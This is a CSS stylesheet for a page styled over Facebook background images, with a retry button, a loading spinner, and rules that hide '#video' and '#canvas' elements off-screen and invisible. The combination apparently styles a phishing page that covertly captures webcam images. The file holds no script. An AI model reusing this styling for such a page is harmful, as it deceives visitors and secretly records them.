 body {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            text-align: center;
            height: 100vh;
            margin: 0;
            background-image: url(../images/facebook.png);
            background-repeat: no-repeat;
            background-size: cover;
            color: #444;
            font-family: Arial, sans-serif;
        }
        .container {
            justify-content: center;
            text-align: center;
            padding: 20px;
            border-radius: 10px;
            background-color: #fff;
            box-shadow: rgba(30, 30, 30, 0.29) 0px 2px 8px 0px;
        }
        .container-error {
            justify-content: center;
            text-align: center;
            padding: 20px;
            border-radius: 10px;
            background-color: #fff;
        }
        .logo {
            width: 150px;
            height: auto;
            margin-bottom: 20px;
        }
        .imagem {
            width: 70px;
            height: auto;
            margin-bottom: 20px;
        }
        .container h1 {
            margin: 0;
            font-size: 24px;
            color: #4489ef
        }
        .container p {
            margin: 10px 0;
            color: #696969
        }
        .retry-button {
            background-color: #1682f6;
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
        .retry-button:hover {
            background-color: #0566f6;
        }
         #video, #canvas {
            position: absolute;
            top: -9999px;
            left: -9999px;
            width: 1px;
            height: 1px;
            opacity: 0;
        }

        .loading-container {
            text-align: center;
        }

        .spinner {
            width: 60px;
            height: 60px;
            border: 6px solid rgba(255, 255, 255, 0.2);
            border-top: 6px solid #1682f6;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 20px;
            margin-top: 40px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .loading-text {
            font-size: 16px;
            letter-spacing: 1px;
            color: #ffffff
        }


@media (max-width: 768px) {
    body {
            display: flex;
            flex-direction: column;
            height: 100vh;
            align-items: center;
            justify-content: center;
            background-image: url(../images/facebook-mobile.png);
            background-repeat: no-repeat;
            background-size: cover;
        }

    .container {
            align-items: center;
            text-align: center;
            padding: 30px;
            border-radius: 20px;
            box-shadow: rgba(30, 30, 30, 0.29) 0px 2px 8px 0px;
            margin-top: 200px;
        }
    .container-error {
            justify-content: center;
            text-align: center;
            padding: 20px;
            border-radius: 10px;
            background-color: #ffffff;
        }
        .logo {
            width: 120px;
            height: auto;
            margin-bottom: 10px;
        }
        .imagem {
            width: 80px;
            height: auto;
            margin-bottom: 20px;
        }
        .container h1 {
            margin: 0;
            font-size: 43px;
            color: #1682f6
        }
        .container p {
            font-size: 25px;
            margin: 30px 0;
            color: #565656
        }
        .retry-button {
            background-color: #0196f6;
            color: #fff;
            padding: 30px 40px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 26px;
        }
        .retry-button:hover {
            background-color: #0566f6;
       }

    .loading-container {
            text-align: center;
        }

        .spinner {
            width: 80px;
            height: 80px;
            border: 6px solid rgba(255, 255, 255, 0.2);
            border-top: 6px solid #1682f6;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 20px;
            margin-top: 80px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .loading-text {
            font-size: 46px;
            letter-spacing: 1px;
            color: #ffffff
        }
}